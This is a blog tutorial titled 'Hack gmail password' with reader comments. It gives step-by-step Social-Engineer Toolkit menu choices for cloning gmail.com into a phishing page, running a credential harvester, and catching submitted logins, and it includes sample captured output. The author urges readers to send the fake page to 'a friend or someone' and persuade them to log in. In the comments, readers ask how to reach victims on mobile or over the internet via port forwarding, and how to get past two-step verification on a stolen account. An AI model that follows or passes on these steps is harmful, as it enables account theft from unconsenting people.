Hack gmail password with social engineering toolkit (SET)

By | April 15, 2013

Social Engineering Toolkit

Social engineering toolkit is the most powerful tool for performing social engineering attacks. It is the metasploit of social engineering in a way. It provides a very easy user interface to perform attacks like phishing, browser exploitation etc. In this tutorial we are going to see how it can be used to perform phishing attack to try to hack the gmail password of someone.

Credential Harvester Attack

Credential Harvester attack is one of the options available inside SET, that can create phishing pages and start a server to serve the pages and catch any user login data. Lets do it and see how it works.

Start SET in a terminal. It should come up with its welcome screen.

.M"""bgd `7MM"""YMM MMP""MM""YMM 
                ,MI    "Y   MM    `7 P'   MM   `7 
                `MMb.       MM   d        MM      
                  `YMMNq.   MMmmMM        MM      
                .     `MM   MM   Y  ,     MM      
                Mb     dM   MM     ,M     MM      
                P"Ybmmd"  .JMMmmmmMMM   .JMML.

  [---]        The Social-Engineer Toolkit (SET)         [---]        
  [---]        Created by: David Kennedy (ReL1K)         [---]
  [---]        Development Team: JR DePre (pr1me)        [---]
  [---]        Development Team: Joey Furr (j0fer)       [---]
  [---]        Development Team: Thomas Werth            [---]
  [---]        Development Team: Garland                 [---]
  [---]                  Version: 3.6                    [---]
  [---]          Codename: 'MMMMhhhhmmmmmmmmm'           [---]
  [---]        Report bugs: [email protected]         [---]
  [---]         Follow me on Twitter: dave_rel1k         [---]
  [---]       Homepage: https://www.trustedsec.com       [---]

   Welcome to the Social-Engineer Toolkit (SET). Your one
    stop shop for all of your social-engineering needs..
    Join us on irc.freenode.net in channel #setoolkit

  The Social-Engineer Toolkit is a product of TrustedSec.

           Visit: https://www.trustedsec.com

 Select from the menu:

   1) Social-Engineering Attacks
   2) Fast-Track Penetration Testing
   3) Third Party Modules
   4) Update the Metasploit Framework
   5) Update the Social-Engineer Toolkit
   6) Update SET configuration
   7) Help, Credits, and About

  99) Exit the Social-Engineer Toolkit


Now for this particular attack type we need to select "Social-Engineering Attacks" from the main menu. Type 1 and press enter. It will again present with a menu that would look like this

Select from the menu:

   1) Spear-Phishing Attack Vectors
   2) Website Attack Vectors
   3) Infectious Media Generator
   4) Create a Payload and Listener
   5) Mass Mailer Attack
   6) Arduino-Based Attack Vector
   7) SMS Spoofing Attack Vector
   8) Wireless Access Point Attack Vector
   9) QRCode Generator Attack Vector
  10) Powershell Attack Vectors
  11) Third Party Modules

  99) Return back to the main menu.

Over here we have the option to select from various kinds of social engineering attacks. For our purpose select option 2 thats "Website Attack Vectors". Again will come another menu like below

1) Java Applet Attack Method
   2) Metasploit Browser Exploit Method
   3) Credential Harvester Attack Method
   4) Tabnabbing Attack Method
   5) Man Left in the Middle Attack Method
   6) Web Jacking Attack Method
   7) Multi-Attack Web Method
   8) Victim Web Profiler
   9) Create or import a CodeSigning Certificate

  99) Return to Main Menu

This time along with this menu, there would be some explanation about each attack. As can be seen the Credential Harvester Attack Method is there on number 3 which we are going to use. It is explained as

The Credential Harvester method will utilize web cloning of a web-site that has a username and password field and harvest all the information posted to the website.

So select number 3 and proceed. It will present another menu like this

1) Web Templates
   2) Site Cloner
   3) Custom Import

  99) Return to Webattack Menu

Now over here we are going to clone gmail.com to construct our phishing page. So select option 2.

[-] Credential harvester will allow you to utilize the clone capabilities within SET
[-] to harvest credentials or parameters from a website as well as place them into a report
[-] This option is used for what IP the server will POST to.
[-] If you're using an external IP, use your external IP for this
set:webattack> IP address for the POST back in Harvester/Tabnabbing:
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone:http://www.gmail.com

The best way to use this attack is if username and password form
fields are available. Regardless, this captures all POSTs on a website.
[!] I have read the above message.

      Press <return> to continue

[*] Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:

On selecting option 2, it will ask for 2 important piece of information. The first is the ip address, to which it would submit the data and second is the url to clone which is in this case gmail.com

So enter the details and press enter when it asks to press return. Now the credential harvester would start a web server on port 80 which would serve the page gmail.com. Open the ip address of the machine in the browser from some other machine or just localhost. For example if SET is running on machine with ip address then open that ip in a browser from another machine "". Or give the ip address to someone else over the network :)

Now, when the username,password is entered and submitted, SET would capture the data and display on the terminal. Moreover, after capturing the data SET would redirect the user to the actual site, that is gmail.com - - [15/Apr/2013 14:56:39] "GET / HTTP/1.1" 200 - - - [15/Apr/2013 14:56:41] "GET / HTTP/1.1" 200 - - - [15/Apr/2013 14:56:41] "GET / HTTP/1.1" 200 -
[*] WE GOT A HIT! Printing the output:
PARAM: continue=http://mail.google.com/mail/
PARAM: service=mail
PARAM: rm=false
PARAM: dsh=-2825129499091793842
PARAM: ltmpl=default
PARAM: scc=1
PARAM: pstMsg=1
PARAM: dnConn=
PARAM: checkConnection=
PARAM: checkedDomains=youtube
PARAM: timeStmp=
PARAM: secTok=
PARAM: _utf8=?
PARAM: bgresponse=!A0KPFdMuBMNZHUQml6hMF2ywpQ8AAxYG6ioCp0BIO0i9C5ftMNPRDRHTXxtZBB9qRoqUjLWLXn3dAJbKr3pT1eJNOwSvoduAgjxCOgnH8u3KZWS0A9kO9pIXNZXJ77OdsqK0T66SEdQLC9QV7QI8op3SM6ldH3rKqEbikKatd9DbrD7QLx3NWHfFR5O6r7PCgCDebXNk56ww-4wiFFmne05oW0ZDMstszHdBd67Z5lleTbvO2544iGrszfYzA1AJU1djcawccdN4bK2WUP1BUPQL3fidQRha5YeNe2cq81e-81DO4AjNX7OfINtsm8zpeSWOX5tHDNZWCnVwz6X5ItbkYNsfZuo9PQvJ5etzTvg6gwCpCZUDtHGR8AwSgxjQsy_hKfuJEmFNmNXFpyUi0Tu_Dw1WckbMNvRcrAhsb682WRI616BFc3aNbwNwfhRC1D6L20oxXcpzshpXxMLQDQr5GoUC6V7FIoTF9ma6mYddyrxdoxmo4d2Vh2vtovJxcYVMNRJpPa-7vvG7Ml_TQC9QJpJ21B608tccYKQpE9FzCzvmVxLMo1SHpr-Q3HChWkx7y-yq4Ba9fkKvt7XuOaq0isbZKeF_y8N1DJqGYusajFb7-jMDkQpnn6uQ-Y1OqalGQ56KSjgyWckWzPnTQ65V5V0doSbmcds8pvkWLFLQ8WM6EDMdX5RT9v5H5fkeMTWadlrJyumtHeerC5fw8qp4G_ZzH8232qySHq21XWvLxcoUS0eXHd8bGn1IA84ZpCuMt7WwEWuXss2OIrf_pfN4-YM3pLtuPIhuAnGoKAJsXS7Sib2cX34mEIiuIeC0fw1CbVqHVRz2nVT8a_QvvAeIYh5HhCz0dbn_P2FE_gosd3wG6Abnh7d08orC0TbzaW61y7H2r0owwU_SRDUKoPmVhVtp-GwjEoEanv7eZ22RgrE
PARAM: signIn=Sign+in
PARAM: PersistentCookie=yes
PARAM: rmShown=1

See the fields Email and Passwd, they contain the details typed by user. If you want to carry out this hack on a real user like your friend or someone, then you have to give them a link that they can open from their computer and access the SET clone of gmail.

If you have SET running on your local machine then you have to give your public ip address to the victim. He would open the link and get the login page of gmail. The rest of task is to persuade him to login through that page. If you are able to do so, then you get the login details. The credential harvester attack is not limited to just stealing the login data. It can capture any generic form submission.

Phishing attacks are very common in the form of spam emails. Hackers setup phishing pages on webhosts and then spread the links over email to users. The phishing pages includes simple email sites to bank logins and even more.

About Silver Moon

A Tech Enthusiast, Blogger, Linux Fan and a Software Developer. Writes about Computer hardware, Linux and Open Source software and coding in Python, Php and Javascript. He can be reached at [email protected].


Hack gmail password with social engineering toolkit (SET)
  1. JAmes

    My IP address that servers as victim link
    It won’t open on mobile browsers just only on my computer
    Please how do I make an IP address phishing link open on my victims mobile browser
    Any help please?

  2. Diego

    When I enter my IP and then the website and hit enter, I get the same options again:

    1) Java Applet Attack Method
    2) Metasploit Browser Exploit Method
    3) Credential Harvester Attack Method
    4) Tabnabbing Attack Method
    5) Web Jacking Attack Method
    6) Multi-Attack Web Method
    7) Full Screen Attack Method
    8) HTA Attack Method

    Do you know why am I doing wrong?


  3. Akash

    I want to ask that the ip address that you have entered is your own ip address or your victims ip address……. plzzzz reply dude as fast as possible.

  4. vishnu

    it only works, if the attacker and victim are on the same network and it won’t work on the different network.

  5. itguy

    is there a way to only grab a CERTAIN post in the harvester? i am doing some work for a company and they don’t want me grabbing passwords, just usernames.. any ideas?

    1. Mordred

      So,i’ve done all this,but my fake/phish site isn’t on the World Wide Web,after doing some research i found out you have to Port Forward your stuff,i know you guys here may get annoyed by a question like this because you guys are expirienced,but how to Port Forward and what is it?I’ve looked it up on google/youtube but didn’t find anything i was looking for :/ Can anyone help?

      1. Akash

        port Forwarding means when you configure your router with ip address and port then it can be use over internet anywhere in world . when you forward your port you can hack your victim over internet still if he is not connected to your internet or over same wifi or lan as you want. your router must have options for port forwarding..


  6. josh

    well worked great, now I have the password of an email, but how i can trick gmail to let me access the account? from another country? she ask for 2 steps access, it is possible to use some of the param?

  7. stargazer

    Very interesting post! i followed your instrustions, everything ok working inside LAN, but when i tried to use my external ip, the the rooter login page appeared instead of gmail. I use no-ip duc and hamachi vpn instead of port forwarding. Any guess? Thanks in advance

    1. Scsi

      You have to configure port forwarding on your router. There will be a tutorial on this in the upcoming issue of ALM @ Facebook.com/AnonLinkPublications

Leave a Reply

Your email address will not be published. Required fields are marked *